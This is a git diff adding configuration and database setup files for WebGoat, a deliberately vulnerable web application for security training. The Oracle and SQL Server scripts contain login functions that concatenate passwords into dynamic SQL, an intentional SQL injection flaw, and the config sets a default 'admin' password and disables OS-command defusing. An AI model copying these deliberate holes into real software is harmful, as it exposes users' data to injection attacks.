diff --git a/main/project/WebContent/WEB-INF/lib/smtp.jar b/main/project/WebContent/WEB-INF/lib/smtp.jar
new file mode 100644
index 000000000..3d906d5d0
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/smtp.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/wsdl4j-1.5.1.jar b/main/project/WebContent/WEB-INF/lib/wsdl4j-1.5.1.jar
new file mode 100644
index 000000000..c6254ee69
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/wsdl4j-1.5.1.jar differ
diff --git a/main/project/WebContent/WEB-INF/server-config.wsdd b/main/project/WebContent/WEB-INF/server-config.wsdd
new file mode 100644
index 000000000..b95bea98c
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/server-config.wsdd
@@ -0,0 +1,69 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
+ <globalConfiguration>
+  <parameter name="sendMultiRefs" value="true"/>
+  <parameter name="disablePrettyXML" value="true"/>
+  <parameter name="adminPassword" value="admin"/>
+<!--
+  <parameter name="attachments.Directory" value="C:\webgoat\tomcat\webapps\WebGoat\WEB-INF\attachments"/>
+-->
+  <parameter name="dotNetSoapEncFix" value="true"/>
+  <parameter name="enableNamespacePrefixOptimization" value="true"/>
+  <parameter name="sendXMLDeclaration" value="true"/>
+<!--
+  <parameter name="attachments.implementation" value="org.apache.axis.attachments.AttachmentsImpl"/>
+-->
+  <parameter name="sendXsiTypes" value="true"/>
+  <requestFlow>
+   <handler type="java:org.apache.axis.handlers.JWSHandler">
+    <parameter name="scope" value="session"/>
+   </handler>
+   <handler type="java:org.apache.axis.handlers.JWSHandler">
+    <parameter name="scope" value="request"/>
+    <parameter name="extension" value=".jwr"/>
+   </handler>
+  </requestFlow>
+ </globalConfiguration>
+ <handler name="LocalResponder" type="java:org.apache.axis.transport.local.LocalResponder"/>
+ <handler name="URLMapper" type="java:org.apache.axis.handlers.http.URLMapper"/>
+ <handler name="Authenticate" type="java:org.apache.axis.handlers.SimpleAuthenticationHandler"/>
+ <service name="WSDLScanning" provider="java:RPC">
+  <parameter name="allowedMethods" value="getFirstName, getLastName, getCreditCard, getLoginCount"/>
+  <parameter name="className" value="org.owasp.webgoat.lessons.WSDLScanning"/>
+ </service>
+ <service name="SoapRequest" provider="java:RPC">
+  <parameter name="allowedMethods" value="getFirstName, getLastName, getCreditCard, getLoginCount"/>
+  <parameter name="className" value="org.owasp.webgoat.lessons.SoapRequest"/>
+ </service>
+ <service name="AdminService" provider="java:MSG">
+  <parameter name="allowedMethods" value="AdminService"/>
+  <parameter name="enableRemoteAdmin" value="false"/>
+  <parameter name="className" value="org.apache.axis.utils.Admin"/>
+  <namespace>http://xml.apache.org/axis/wsdd/</namespace>
+ </service>
+ <service name="Version" provider="java:RPC">
+  <parameter name="allowedMethods" value="getVersion"/>
+  <parameter name="className" value="org.apache.axis.Version"/>
+ </service>
+ <service name="WsSqlInjection" provider="java:RPC">
+  <parameter name="allowedMethods" value="getCreditCard"/>
+  <parameter name="className" value="org.owasp.webgoat.lessons.WsSqlInjection"/>
+ </service>
+ <transport name="http">
+  <requestFlow>
+   <handler type="URLMapper"/>
+   <handler type="java:org.apache.axis.handlers.http.HTTPAuthHandler"/>
+  </requestFlow>
+  <parameter name="qs:list" value="org.apache.axis.transport.http.QSListHandler"/>
+  <parameter name="qs:wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/>
+  <parameter name="qs.list" value="org.apache.axis.transport.http.QSListHandler"/>
+  <parameter name="qs.method" value="org.apache.axis.transport.http.QSMethodHandler"/>
+  <parameter name="qs:method" value="org.apache.axis.transport.http.QSMethodHandler"/>
+  <parameter name="qs.wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/>
+ </transport>
+ <transport name="local">
+  <responseFlow>
+   <handler type="LocalResponder"/>
+  </responseFlow>
+ </transport>
+</deployment>
diff --git a/main/project/WebContent/WEB-INF/web.xml b/main/project/WebContent/WEB-INF/web.xml
new file mode 100755
index 000000000..a7acfa348
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/web.xml
@@ -0,0 +1,344 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE web-app 
+    PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" 
+    "http://java.sun.com/dtd/web-app_2_3.dtd">
+
+<web-app>
+
+    <!-- General description of your web application -->
+    <display-name>WebGoat</display-name>
+    <description>
+      This web application is designed to demonstrate web
+      application security flaws for the purpose of educating
+      developers and security professionals about web
+      application security problems. Please contact Bruce Mayhew 
+      (webgoat@owasp.org) if you have any questions.
+    </description>
+
+
+
+   <!-- Context initialization parameters that define shared
+         String constants used within your application, which
+         can be customized by the system administrator who is
+         installing your application.  The values actually
+         assigned to these parameters can be retrieved in a
+         servlet or JSP page by calling:
+
+             String value =
+               getServletContext().getInitParameter("name");
+
+         where "name" matches the <param-name> element of
+         one of these initialization parameters.
+
+         You can define any number of context initialization
+         parameters, including zero.
+    -->
+
+    <context-param>
+      <param-name>email</param-name>
+      <param-value>WebGoat@owasp.org</param-value>
+      <description>
+        The EMAIL address of the administrator to whom questions
+        and comments about this application should be addressed.
+      </description>
+    </context-param>
+
+    <!-- Servlet definitions for the servlets that make up
+         your web application, including initialization
+         parameters.  With Tomcat, you can also send requests
+         to servlets not listed here with a request like this:
+
+           http://localhost:8080/{context-path}/servlet/{classname}
+
+         but this usage is not guaranteed to be portable.  It also
+         makes relative references to images and other resources
+         required by your servlet more complicated, so defining
+         all of your servlets (and defining a mapping to them with
+         a servlet-mapping element) is recommended.
+
+         Servlet initialization parameters can be retrieved in a
+         servlet or JSP page by calling:
+
+            String value =
+               getServletConfig().getInitParameter("name");
+
+         where "name" matches the <param-name> element of
+         one of these initialization parameters.
+
+         You can define any number of servlets, including zero.
+    -->
+
+    <servlet>
+      <servlet-name>AxisServlet</servlet-name>
+      <display-name>Apache-Axis Servlet</display-name>
+      <servlet-class>
+          org.apache.axis.transport.http.AxisServlet
+      </servlet-class>
+    </servlet>
+ 
+    <servlet>
+      <servlet-name>AdminServlet</servlet-name>
+      <display-name>Axis Admin Servlet</display-name>
+      <servlet-class>
+          org.apache.axis.transport.http.AdminServlet
+      </servlet-class>
+      <load-on-startup>100</load-on-startup>
+    </servlet>
+
+    <servlet>
+      <servlet-name>SOAPMonitorService</servlet-name>
+      <display-name>SOAPMonitorService</display-name>
+      <servlet-class>
+          org.apache.axis.monitor.SOAPMonitorService
+      </servlet-class>
+      <init-param>
+        <param-name>SOAPMonitorPort</param-name>
+        <param-value>5001</param-value>
+      </init-param>
+      <load-on-startup>100</load-on-startup>
+    </servlet>
+ 
+    <servlet>
+      <servlet-name>WebGoat</servlet-name>
+      <description>
+        This servlet plays the "controller" role in the MVC architecture
+        used in this application.
+
+        The initialization parameter namess for this servlet are the
+        "servlet path" that will be received by this servlet (after the
+        filename extension is removed).  The corresponding value is the
+        name of the action class that will be used to process this request.
+      </description>
+      <servlet-class>org.owasp.webgoat.HammerHead</servlet-class>
+
+	  <init-param>
+            <param-name>debug</param-name>
+            <param-value>false</param-value>
+      </init-param>
+
+      <init-param>
+            <param-name>CookieDebug</param-name>
+            <param-value>true</param-value>
+      </init-param>
+
+      <init-param>
+            <param-name>DefuseOSCommands</param-name>
+            <param-value>false</param-value>
+      </init-param>
+      
+      <init-param>
+            <param-name>Enterprise</param-name>
+            <param-value>true</param-value>
+      </init-param>
+      
+      <init-param>
+            <param-name>CodingExercises</param-name>
+            <param-value>true</param-value>
+      </init-param>
+      
+      <init-param>
+      		<!-- Specify an address where you would like comments to be sent.  -->
+      		<!-- This can be any URL or HTML tags, and will appear on the report card and lesson incomplete pages -->
+      		<!-- Use iso8859-1 encoding to represent special characters that might confuse XML parser. For 
+      			 example, replace "<" with "&lt;" and ">" with "&gt;". -->
+            <param-name>FeedbackAddress</param-name>
+            <param-value>
+				&lt;A HREF=mailto:webgoat@owasp.org&gt;webgoat@owasp.org&lt;/A&gt;
+            </param-value>
+      </init-param>
+      
+      <init-param>
+            <param-name>DatabaseDriver</param-name>
+            <param-value>
+		    	org.hsqldb.jdbcDriver
+            </param-value>
+      </init-param>
+
+      <init-param>
+            <param-name>DatabaseConnectionString</param-name>
+            <!-- 
+            The string "${USER}" in the connection string will be replaced by the active username
+            when making a connection.
+             -->
+            <param-value>
+				jdbc:hsqldb:mem:${USER}
+		    </param-value>
+      </init-param>
+
+      <!-- Load this servlet at server startup time -->
+
+      <load-on-startup>5</load-on-startup>
+
+    </servlet>
+
+
+    <servlet>
+      <servlet-name>LessonSource</servlet-name>
+      <description>
+        This servlet returns the Java source of the current lesson. 
+      </description>
+      <servlet-class>org.owasp.webgoat.LessonSource</servlet-class>
+    </servlet>
+
+    <servlet>
+      <servlet-name>Catcher</servlet-name>
+      <description>
+        This servlet catches any posts and marks the appropriate lesson property. 
+      </description>
+      <servlet-class>org.owasp.webgoat.Catcher</servlet-class>
+    </servlet>
+
+    <servlet>
+	 <servlet-name>conf</servlet-name>
+	 <jsp-file>/lessons/ConfManagement/config.jsp</jsp-file>
+    </servlet>
+    <!-- Define mappings that are used by the servlet container to
+         translate a particular request URI (context-relative) to a
+         particular servlet.  The examples below correspond to the
+         servlet descriptions above.  Thus, a request URI like:
+
+           http://localhost:8080/{contextpath}/graph
+
+         will be mapped to the "graph" servlet, while a request like:
+
+           http://localhost:8080/{contextpath}/saveCustomer.do
+
+         will be mapped to the "controller" servlet.
+
+         You may define any number of servlet mappings, including zero.
+         It is also legal to define more than one mapping for the same
+         servlet, if you wish to.
+    -->
+
+
+    <servlet-mapping>
+      <servlet-name>AxisServlet</servlet-name>
+      <url-pattern>/servlet/AxisServlet</url-pattern>
+    </servlet-mapping>
+ 
+    <servlet-mapping>
+      <servlet-name>AxisServlet</servlet-name>
+      <url-pattern>*.jws</url-pattern>
+    </servlet-mapping>
+ 
+    <servlet-mapping>
+      <servlet-name>AxisServlet</servlet-name>
+      <url-pattern>/services/*</url-pattern>
+    </servlet-mapping>
+ 
+    <servlet-mapping>
+      <servlet-name>SOAPMonitorService</servlet-name>
+      <url-pattern>/SOAPMonitor</url-pattern>
+    </servlet-mapping>
+ 
+    <!-- uncomment this if you want the admin servlet -->
+    <!--
+    <servlet-mapping>
+      <servlet-name>AdminServlet</servlet-name>
+      <url-pattern>/servlet/AdminServlet</url-pattern>
+    </servlet-mapping>
+     -->
+
+    <servlet-mapping>
+      <servlet-name>WebGoat</servlet-name>
+      <url-pattern>/attack</url-pattern>
+    </servlet-mapping>
+    
+    <servlet-mapping>
+      <servlet-name>LessonSource</servlet-name>
+      <url-pattern>/source</url-pattern>
+    </servlet-mapping>
+
+    <servlet-mapping>
+      <servlet-name>Catcher</servlet-name>
+      <url-pattern>/catcher</url-pattern>
+    </servlet-mapping>
+
+    <servlet-mapping>
+      <servlet-name>conf</servlet-name>
+      <url-pattern>/conf</url-pattern>
+    </servlet-mapping>
+
+    <!-- Define the default session timeout for your application,
+         in minutes.  From a servlet or JSP page, you can modify
+         the timeout for a particular session dynamically by using
+         HttpSession.getMaxInactiveInterval(). -->
+
+    <session-config>
+    	<!-- 2 days -->
+        <session-timeout>2880</session-timeout>
+    </session-config>
+
+    <mime-mapping>
+        <extension>wmv</extension>
+        <mime-type>video/x-ms-wmv</mime-type>
+    </mime-mapping>
+
+	<!-- Define reference to the user database for looking up roles -->
+	<resource-env-ref>
+	    <description>
+	      Link to the UserDatabase instance from which we request lists of
+	      defined role names.  Typically, this will be connected to the global
+	      user database with a ResourceLink element in server.xml or the context
+	      configuration file for the Manager web application.
+	    </description>
+	    <resource-env-ref-name>users</resource-env-ref-name>
+	    <resource-env-ref-type>
+	      org.apache.catalina.UserDatabase
+	    </resource-env-ref-type>
+	</resource-env-ref>
+	
+
+	<!-- Define a Security Constraint on this Application -->
+	<security-constraint>
+	    <web-resource-collection>
+	      <web-resource-name>WebGoat Application</web-resource-name>
+	      <url-pattern>/*</url-pattern>
+	    </web-resource-collection>
+	    <auth-constraint>
+	       <role-name>webgoat_user</role-name>
+	       <role-name>webgoat_admin</role-name>
+	       <role-name>webgoat_challenge</role-name>
+	    </auth-constraint>
+	</security-constraint>
+	
+	<security-constraint>
+	    <web-resource-collection>
+	      <web-resource-name>WebGoat Application Source</web-resource-name>
+	      <url-pattern>/JavaSource/*</url-pattern>
+	    </web-resource-collection>
+	    <auth-constraint>
+	       <role-name>server_admin</role-name>
+	    </auth-constraint>
+	</security-constraint>
+	
+	
+	<!-- Login configuration uses BASIC authentication -->
+	<login-config>
+	    <auth-method>BASIC</auth-method>
+	    <realm-name>WebGoat Application</realm-name>
+	</login-config>
+	
+	<!-- Security roles referenced by this web application -->
+	<security-role>
+	    <description>The role that is required to administrate WebGoat</description>
+	    <role-name>webgoat_admin</role-name>
+	</security-role>
+	
+	<security-role>
+	    <description>The role that is required to start the challenge log viewer</description>
+	    <role-name>webgoat_challenge</role-name>
+	</security-role>
+
+	<security-role>
+	    <description>The role that is required to use WebGoat</description>
+	    <role-name>webgoat_user</role-name>
+	</security-role>
+
+	<security-role>
+	    <description>This role is for admins only</description>
+	    <role-name>server_admin</role-name>
+	</security-role>
+
+</web-app>
+
diff --git a/main/project/WebContent/WEB-INF/webgoat-class.properties b/main/project/WebContent/WEB-INF/webgoat-class.properties
new file mode 100644
index 000000000..e8de6a179
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/webgoat-class.properties
@@ -0,0 +1,58 @@
+category.General.ranking=11
+lesson.HttpBasics.ranking=10
+lesson.HttpSplitting.ranking=20
+lesson.ThreadSafetyProblem.ranking=30
+
+category.Broken\ Authentication\ and\ Session\ Management.ranking=21
+lesson.BasicAuthentication.ranking=10
+lesson.WeakAuthenticationCookie.ranking=20
+
+category.Broken\ Access\ Control.ranking=31
+lesson.AccessControlMatrix.ranking=10
+lesson.PathBasedAccessControl.ranking=20
+lesson.RoleBasedAccessControl.hidden=true
+
+category.Cross-Site\ Scripting\ (XSS).ranking=41
+lesson.StoredXss.ranking=10
+lesson.ReflectedXSS.ranking=20
+lesson.CSRF.ranking=30
+lesson.CrossSiteScripting.hidden=true
+
+category.Unvalidated\ Parameters.ranking=51
+lesson.HiddenFieldTampering.ranking=10
+lesson.JavaScriptValidation.ranking=20
+lesson.UncheckedEmail.ranking=30
+
+category.Insecure\ Storage.ranking=61
+lesson.Encoding.ranking=10
+
+category.Injection\ Flaws.ranking=71
+lesson.SqlNumericInjection.ranking=10
+lesson.SqlStringInjection.ranking=20
+lesson.CommandInjection.ranking=30
+lesson.LogSpoofing.ranking=40
+lesson.SQLInjection.hidden=true
+
+category.Improper\ Error\ Handling.ranking=81
+lesson.FailOpenAuthentication.ranking=10
+
+category.Code\ Quality.ranking=91
+lesson.HtmlClues.ranking=10
+
+category.Web\ Services.category.ranking=101
+lesson.SoapRequest.ranking=10
+lesson.WSDLScanning.ranking=20
+lesson.WsSqlInjection.ranking=30
+
+category.New\ Lesson.category.ranking=111
+lesson.HowToAddNewLesson.ranking=10
+
+lesson.WeakSessionID.hidden=true
+lesson.BufferOverflow.hidden=true
+lesson.BlindSqlInjection.hidden=true
+lesson.DOS_Login.hidden=true
+lesson.ForcedBrowsing.hidden=true
+lesson.ForgotPassword.hidden=true
+lesson.ParameterInjection.hidden=true
+lesson.RemoteAdminFlaw.hidden=true
+lesson.ChallengeScreen.hidden=true
\ No newline at end of file
diff --git a/main/project/WebContent/WEB-INF/webgoat-lab.properties b/main/project/WebContent/WEB-INF/webgoat-lab.properties
new file mode 100644
index 000000000..95adfcacc
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/webgoat-lab.properties
@@ -0,0 +1,55 @@
+category.General.ranking=11
+lesson.HttpBasics.ranking=10
+lesson.HttpSplitting.ranking=20
+lesson.ThreadSafetyProblem.ranking=30
+
+category.Broken\ Authentication\ and\ Session\ Management.ranking=21
+lesson.BasicAuthentication.ranking=10
+lesson.WeakAuthenticationCookie.ranking=20
+
+category.Broken\ Access\ Control.ranking=31
+lesson.AccessControlMatrix.ranking=10
+lesson.PathBasedAccessControl.ranking=20
+
+category.Cross-Site\ Scripting\ (XSS).ranking=41
+lesson.StoredXss.ranking=10
+lesson.ReflectedXSS.ranking=20
+lesson.CSRF.ranking=30
+
+category.Unvalidated\ Parameters.ranking=51
+lesson.HiddenFieldTampering.ranking=10
+lesson.JavaScriptValidation.ranking=20
+lesson.UncheckedEmail.ranking=30
+
+category.Insecure\ Storage.ranking=61
+lesson.Encoding.ranking=10
+
+category.Injection\ Flaws.ranking=71
+lesson.SqlNumericInjection.ranking=10
+lesson.SqlStringInjection.ranking=20
+lesson.CommandInjection.ranking=30
+lesson.LogSpoofing.ranking=40
+
+category.Improper\ Error\ Handling.ranking=81
+lesson.FailOpenAuthentication.ranking=10
+
+category.Code\ Quality.ranking=91
+lesson.HtmlClues.ranking=10
+
+category.Web\ Services.category.ranking=101
+lesson.SoapRequest.ranking=10
+lesson.WSDLScanning.ranking=20
+lesson.WsSqlInjection.ranking=30
+
+category.New\ Lesson.category.ranking=111
+lesson.HowToAddNewLesson.ranking=10
+
+lesson.WeakSessionID.hidden=true
+lesson.BufferOverflow.hidden=true
+lesson.BlindSqlInjection.hidden=true
+lesson.DOS_Login.hidden=true
+lesson.ForcedBrowsing.hidden=true
+lesson.ForgotPassword.hidden=true
+lesson.ParameterInjection.hidden=true
+lesson.RemoteAdminFlaw.hidden=true
+lesson.ChallengeScreen.hidden=true
diff --git a/main/project/WebContent/WEB-INF/webgoat-owasp.properties b/main/project/WebContent/WEB-INF/webgoat-owasp.properties
new file mode 100644
index 000000000..985d9dda0
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/webgoat-owasp.properties
@@ -0,0 +1 @@
+#lesson.BufferOverflow.hidden=true
diff --git a/main/project/WebContent/WEB-INF/webgoat.properties b/main/project/WebContent/WEB-INF/webgoat.properties
new file mode 100755
index 000000000..985d9dda0
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/webgoat.properties
@@ -0,0 +1 @@
+#lesson.BufferOverflow.hidden=true
diff --git a/main/project/WebContent/WEB-INF/webgoat_oracle.sql b/main/project/WebContent/WEB-INF/webgoat_oracle.sql
new file mode 100755
index 000000000..9894eb2a7
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/webgoat_oracle.sql
@@ -0,0 +1,132 @@
+DROP USER webgoat_guest CASCADE;
+CREATE USER webgoat_guest IDENTIFIED BY webgoat DEFAULT TABLESPACE users;
+GRANT CONNECT, RESOURCE TO webgoat_guest;
+GRANT CREATE PROCEDURE TO webgoat_guest;
+
+CREATE TABLE WEBGOAT_guest.EMPLOYEE (
+    userid INT NOT NULL PRIMARY KEY,
+    first_name VARCHAR(20),
+    last_name VARCHAR(20),
+    ssn VARCHAR(12),
+    password VARCHAR(10),
+    title VARCHAR(20),
+    phone VARCHAR(13),
+    address1 VARCHAR(80),
+    address2 VARCHAR(80),
+    manager INT,
+    start_date CHAR(8),
+    salary INT,
+    ccn VARCHAR(30),
+    ccn_limit INT,
+    disciplined_date CHAR(8),
+    disciplined_notes VARCHAR(60),
+    personal_description VARCHAR(60)
+);
+
+
+CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
+    stmt VARCHAR(32767);cnt NUMBER;
+BEGIN
+    stmt  := 'SELECT COUNT (*) FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';
+    EXECUTE IMMEDIATE stmt INTO cnt;
+    RETURN cnt;
+END;
+/
+
+CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN_BACKUP(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
+    stmt VARCHAR(32767);cnt NUMBER;
+BEGIN
+    stmt  := 'SELECT COUNT (*) FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';
+    EXECUTE IMMEDIATE stmt INTO cnt;
+    RETURN cnt;
+END;
+/
+
+CREATE OR REPLACE PROCEDURE WEBGOAT_guest.UPDATE_EMPLOYEE(
+    v_userid IN employee.userid%type, 
+    v_first_name IN employee.first_name%type, 
+    v_last_name IN employee.last_name%type, 
+    v_ssn IN employee.ssn%type, 
+    v_title IN employee.title%type, 
+    v_phone IN employee.phone%type, 
+    v_address1 IN employee.address1%type, 
+    v_address2 IN employee.address2%type, 
+    v_manager IN employee.manager%type, 
+    v_start_date IN employee.start_date%type, 
+    v_salary IN employee.salary%type, 
+    v_ccn IN employee.ccn%type, 
+    v_ccn_limit IN employee.ccn_limit%type, 
+    v_disciplined_date IN employee.disciplined_date%type, 
+    v_disciplined_notes IN employee.disciplined_notes%type, 
+    v_personal_description IN employee.personal_description%type
+)
+AS 
+BEGIN
+    UPDATE EMPLOYEE
+    SET
+        first_name = v_first_name, 
+        last_name = v_last_name, 
+        ssn = v_ssn, 
+        title = v_title, 
+        phone = v_phone, 
+        address1 = v_address1, 
+        address2 = v_address2, 
+        manager = v_manager, 
+        start_date = v_Start_date,
+        salary = v_salary, 
+        ccn = v_ccn, 
+        ccn_limit = v_ccn_limit, 
+        disciplined_date = v_disciplined_date, 
+        disciplined_notes = v_disciplined_notes, 
+        personal_description = v_personal_description
+    WHERE
+        userid = v_userid;
+END;
+/
+
+CREATE OR REPLACE PROCEDURE WEBGOAT_guest.UPDATE_EMPLOYEE_BACKUP(
+    v_userid IN employee.userid%type, 
+    v_first_name IN employee.first_name%type, 
+    v_last_name IN employee.last_name%type, 
+    v_ssn IN employee.ssn%type, 
+    v_title IN employee.title%type, 
+    v_phone IN employee.phone%type, 
+    v_address1 IN employee.address1%type, 
+    v_address2 IN employee.address2%type, 
+    v_manager IN employee.manager%type, 
+    v_start_date IN employee.start_date%type, 
+    v_salary IN employee.salary%type, 
+    v_ccn IN employee.ccn%type, 
+    v_ccn_limit IN employee.ccn_limit%type, 
+    v_disciplined_date IN employee.disciplined_date%type, 
+    v_disciplined_notes IN employee.disciplined_notes%type, 
+    v_personal_description IN employee.personal_description%type
+)
+AS 
+BEGIN
+    UPDATE EMPLOYEE
+    SET
+        first_name = v_first_name, 
+        last_name = v_last_name, 
+        ssn = v_ssn, 
+        title = v_title, 
+        phone = v_phone, 
+        address1 = v_address1, 
+        address2 = v_address2, 
+        manager = v_manager, 
+        start_date = v_Start_date,
+        salary = v_salary, 
+        ccn = v_ccn, 
+        ccn_limit = v_ccn_limit, 
+        disciplined_date = v_disciplined_date, 
+        disciplined_notes = v_disciplined_notes, 
+        personal_description = v_personal_description
+    WHERE
+        userid = v_userid;
+END;
+/
+
+
+exit;
+
+
diff --git a/main/project/WebContent/WEB-INF/webgoat_sqlserver.sql b/main/project/WebContent/WEB-INF/webgoat_sqlserver.sql
new file mode 100644
index 000000000..eea05a7f6
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/webgoat_sqlserver.sql
@@ -0,0 +1,226 @@
+EXEC sp_configure 'clr enabled', 1
+GO
+
+RECONFIGURE
+GO
+
+USE master;
+
+go
+
+DROP LOGIN webgoat_guest;
+
+go
+
+DROP database webgoat;
+
+go
+
+
+CREATE database webgoat;
+
+go
+
+USE webgoat;
+
+go
+
+CREATE SCHEMA webgoat_guest;
+
+go
+
+CREATE LOGIN webgoat_guest with password = '_webgoat';
+
+go
+
+CREATE USER webgoat_guest with default_schema = webgoat_guest;
+
+go
+
+GRANT CONTROL TO webgoat_guest;
+
+go
+
+
+CREATE TABLE WEBGOAT_guest.EMPLOYEE (
+    userid INT NOT NULL PRIMARY KEY,
+    first_name VARCHAR(20),
+    last_name VARCHAR(20),
+    ssn VARCHAR(12),
+    password VARCHAR(10),
+    title VARCHAR(20),
+    phone VARCHAR(13),
+    address1 VARCHAR(80),
+    address2 VARCHAR(80),
+    manager INT,
+    start_date CHAR(8),
+    salary INT,
+    ccn VARCHAR(30),
+    ccn_limit INT,
+    disciplined_date CHAR(8),
+    disciplined_notes VARCHAR(60),
+    personal_description VARCHAR(60)
+);
+
+go
+
+IF EXISTS
+(
+	SELECT	1
+	FROM	INFORMATION_SCHEMA.ROUTINES
+	WHERE		ROUTINE_NAME 	= 'UPDATE_EMPLOYEE'
+		AND	ROUTINE_SCHEMA	= 'webgoat_guest'
+		AND	ROUTINE_TYPE	= 'PROCEDURE'
+)
+BEGIN
+	DROP PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
+	DROP PROCEDURE webgoat_guest.UPDATE_EMPLOYEE_BACKUP
+END
+GO
+
+CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
+    @v_userid INT,
+    @v_first_name VARCHAR(20),
+    @v_last_name VARCHAR(20),
+    @v_ssn VARCHAR(12),
+    @v_title VARCHAR(20),
+    @v_phone VARCHAR(13),
+    @v_address1 VARCHAR(80),
+    @v_address2 VARCHAR(80),
+    @v_manager INT,
+    @v_start_date CHAR(8),
+    @v_salary INT,
+    @v_ccn VARCHAR(30),
+    @v_ccn_limit INT,
+    @v_disciplined_date CHAR(8),
+    @v_disciplined_notes VARCHAR(60),
+    @v_personal_description VARCHAR(60)
+AS
+    UPDATE EMPLOYEE
+    SET
+        first_name = @v_first_name, 
+        last_name = @v_last_name, 
+        ssn = @v_ssn, 
+        title = @v_title, 
+        phone = @v_phone, 
+        address1 = @v_address1, 
+        address2 = @v_address2, 
+        manager = @v_manager, 
+        start_date = @v_Start_date,
+        salary = @v_salary, 
+        ccn = @v_ccn, 
+        ccn_limit = @v_ccn_limit, 
+        disciplined_date = @v_disciplined_date, 
+        disciplined_notes = @v_disciplined_notes, 
+        personal_description = @v_personal_description
+    WHERE
+        userid = @v_userid;
+
+go
+
+CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE_BACKUP
+    @v_userid INT,
+    @v_first_name VARCHAR(20),
+    @v_last_name VARCHAR(20),
+    @v_ssn VARCHAR(12),
+    @v_title VARCHAR(20),
+    @v_phone VARCHAR(13),
+    @v_address1 VARCHAR(80),
+    @v_address2 VARCHAR(80),
+    @v_manager INT,
+    @v_start_date CHAR(8),
+    @v_salary INT,
+    @v_ccn VARCHAR(30),
+    @v_ccn_limit INT,
+    @v_disciplined_date CHAR(8),
+    @v_disciplined_notes VARCHAR(60),
+    @v_personal_description VARCHAR(60)
+AS
+    UPDATE EMPLOYEE
+    SET
+        first_name = @v_first_name, 
+        last_name = @v_last_name, 
+        ssn = @v_ssn, 
+        title = @v_title, 
+        phone = @v_phone, 
+        address1 = @v_address1, 
+        address2 = @v_address2, 
+        manager = @v_manager, 
+        start_date = @v_Start_date,
+        salary = @v_salary, 
+        ccn = @v_ccn, 
+        ccn_limit = @v_ccn_limit, 
+        disciplined_date = @v_disciplined_date, 
+        disciplined_notes = @v_disciplined_notes, 
+        personal_description = @v_personal_description
+    WHERE
+        userid = @v_userid;
+
+go
+
+IF EXISTS
+(
+	SELECT	1
+	FROM	INFORMATION_SCHEMA.ROUTINES
+	WHERE		ROUTINE_NAME 	= 'EMPLOYEE_LOGIN'
+		AND	ROUTINE_SCHEMA	= 'webgoat_guest'
+		AND	ROUTINE_TYPE	= 'FUNCTION'
+)
+BEGIN
+	DROP FUNCTION webgoat_guest.EMPLOYEE_LOGIN
+	DROP FUNCTION webgoat_guest.EMPLOYEE_LOGIN_BACKUP
+END
+GO
+
+CREATE FUNCTION webgoat_guest.EMPLOYEE_LOGIN (
+    @v_id INT,
+    @v_password VARCHAR(100)
+) RETURNS INTEGER
+AS
+    BEGIN
+        DECLARE @sql nvarchar(4000), @count int
+        SELECT @sql = N'SELECT @cnt = COUNT(*) FROM EMPLOYEE WHERE USERID = ' + convert(varchar(10),@v_id) + N' AND PASSWORD = ''' + @v_password + N'''';
+        EXEC sp_executesql @sql, N'@cnt int OUTPUT', @cnt = @count OUTPUT
+        return @count
+    END
+GO
+
+CREATE FUNCTION webgoat_guest.EMPLOYEE_LOGIN_BACKUP (
+    @v_id INT,
+    @v_password VARCHAR(100)
+) RETURNS INTEGER
+AS
+    BEGIN
+        DECLARE @sql nvarchar(4000), @count int
+        SELECT @sql = N'SELECT @cnt = COUNT(*) FROM EMPLOYEE WHERE USERID = ' + convert(varchar(10),@v_id) + N' AND PASSWORD = ''' + @v_password + N'''';
+        EXEC sp_executesql @sql, N'@cnt int OUTPUT', @cnt = @count OUTPUT
+        return @count
+    END
+GO
+
+IF EXISTS
+(
+	SELECT	1
+	FROM	INFORMATION_SCHEMA.ROUTINES
+	WHERE		ROUTINE_NAME 	= 'RegexMatch'
+		AND	ROUTINE_SCHEMA	= 'webgoat_guest'
+		AND	ROUTINE_TYPE	= 'FUNCTION'
+)
+BEGIN
+	DROP FUNCTION webgoat_guest.RegexMatch
+END
+GO
+
+IF EXISTS (SELECT name FROM sys.assemblies WHERE name = N'RegexMatch') 
+	DROP ASSEMBLY RegexMatch;
+GO
+
+CREATE ASSEMBLY RegexMatch FROM 'C:\AspectClass\Database\Labs\project\WebContent\WEB-INF\RegexMatch.dll' WITH PERMISSION_SET = SAFE;
+GO
+
+CREATE FUNCTION webgoat_guest.RegexMatch (
+@input NVARCHAR(MAX),
+@pattern NVARCHAR(MAX)
+) RETURNS BIT
+AS EXTERNAL NAME  RegexMatch.[UserDefinedFunctions].RegexMatch;
+GO
diff --git a/main/project/WebContent/css/layers.css b/main/project/WebContent/css/layers.css
new file mode 100644
index 000000000..dfcb405da
--- /dev/null
+++ b/main/project/WebContent/css/layers.css
@@ -0,0 +1,2 @@
+#lessonTitle {position:absolute;left:94px;top:75px;width:690px;height:22px;z-index:1;float: right;font-size: 20px;color: #FFFFFF;}
